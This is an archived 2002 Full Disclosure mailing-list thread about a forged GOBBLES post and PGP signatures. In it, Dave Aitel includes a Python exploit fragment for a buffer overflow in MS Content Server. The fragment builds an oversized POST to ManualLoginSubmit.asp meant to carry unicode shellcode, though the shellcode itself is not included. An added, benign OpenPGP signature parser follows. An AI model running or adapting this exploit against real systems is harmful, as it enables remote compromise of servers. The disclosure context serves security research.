Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Dave Aitel)
Date: 14 Aug 2002 17:06:11 -0400
At least you got the key id correct that time. It's not a valid signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

#returns the sploitstring
def makesploit(self):
    header=""
    body=""
    body+="NR_DOMAIN=WinNT%3A%2F%2F"
    #1 alignment byte so we are word aligned with the return addr
    attack=""
    attack+="A"
    attack+="\x41\xb9"*4000
    #unicode shellcode!!
    attack=stroverwrite(attack,unicodeloop,1)
    print "length of overflow = "+str(len(attack))
    attack=urllib.quote(attack)
    #print attack

    body+=attack

    body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"

    header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
    header+="Host: "+self.host+"\r\n"
    header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
    header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
    header+="Connection: keep-alive\r\n"
    header+="Content-Type: application/x-www-form-urlencoded\r\n"
    header+="Content-Length: "+str(len(body))+"\r\n"
    header+="\r\n"

    return header+body


#this stuff happens.
if __name__ == '__main__':
    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()

    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))
    if len(sys.argv) > 3:
        app.setSSL(1)

    app.run()

On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> or if you like
>
> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:
>> On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
>>> Gobbles,
>>>
>>> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
>>>> GOBBLES just want to be cool whitehat like everyone else. Time for new
>>>> leaf time for six figure salary stock option naked breasted assistant.
>>>
>>> Word to that my man! ;)
>>>
>>> peace,
>>> core
>>
>> Your message was signed, but the "GOBBLES" message was not and therefore
>> just a forgery, most likely.
>>
>> BTW: http://www.immunitysec.com/vulnerabilities/
>> They aren't advisories, but if you need something to show to your boss
>> about why you disconnected your Exchange/SQL server from the Internet,
>> it's a good start.
>>
>> Dave Aitel
>> Immunity, Inc
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
> =xfu0
> -----END PGP SIGNATURE-----
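The reply above says the forged post at least got the key id right. As an added example that is not code from the original thread, here is a small RFC 4880 parser for the fields an analyst can read off an armored OpenPGP signature without holding any keys: it takes the signature block quoted above (the only input copied from the page) and returns the issuer key ID, the signer user ID, the algorithms and the creation time; the function and field names are my own.

```python
import base64

# Constructed sample: the armored signature from the "GOBBLES" post quoted above, copied from the archive.
SIG_ARMOR = """-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----"""

def dearmor(armor):
    # RFC 4880 s6.2: drop the BEGIN/END lines, the armor headers up to the blank line, and the =CRC24 line.
    body = armor.strip().splitlines()[1:-1]
    data = body[body.index("") + 1:]
    return base64.b64decode("".join(ln for ln in data if not ln.startswith("=")))

def read_len(buf, i):
    # One- and two-octet new-format lengths (RFC 4880 s4.2.2, s5.2.3.1); longer forms are not needed here.
    if buf[i] < 192:
        return buf[i], i + 1
    return ((buf[i] - 192) << 8) + buf[i + 1] + 192, i + 2

def subpackets(area):
    # Yield (type, data) pairs; the first octet of each subpacket is its type.
    i = 0
    while i < len(area):
        n, i = read_len(area, i)
        yield area[i], area[i + 1:i + n]
        i += n

def parse_v4_signature(packet):
    # Triage fields from a new-format v4 signature packet (RFC 4880 s5.2.3); the v4 layout is assumed.
    if (packet[0] & 0xC0) != 0xC0 or (packet[0] & 0x3F) != 2:
        raise ValueError("not a new-format signature packet")
    n, i = read_len(packet, 1)
    body = packet[i:i + n]
    hlen = int.from_bytes(body[4:6], "big")
    ulen = int.from_bytes(body[6 + hlen:8 + hlen], "big")
    hashed, unhashed = body[6:6 + hlen], body[8 + hlen:8 + hlen + ulen]
    # Subpacket 2 = creation time (hashed, so covered by the signature); 16 = issuer key ID;
    # 28 = signer's user ID. An unhashed issuer ID is a bare claim, not proof that key signed anything.
    sp = dict(list(subpackets(hashed)) + list(subpackets(unhashed)))
    return {"version": body[0], "sig_type": body[1], "pk_algo": body[2], "hash_algo": body[3],
            "created": int.from_bytes(sp[2], "big"),
            "issuer_key_id": sp.get(16, b"").hex().upper(),
            "issuer_is_hashed": 16 in dict(subpackets(hashed)),
            "signer_uid": sp.get(28, b"").decode("utf-8", "replace"),
            "hash_prefix": body[8 + hlen + ulen:10 + hlen + ulen].hex()}
```

On this block the issuer key ID decodes to 1CD1A7972199B00F (unhashed), the signer user ID to gobbles@hushmail.com, the algorithms to DSA with SHA1, and the creation time 0x3D47F2CE to 31 Jul 2002 14:23 UTC, two weeks before the message it is attached to. Checking that the signature actually matches the signed text still needs the public key and a real OpenPGP implementation; this parser only tells you what the block claims about itself.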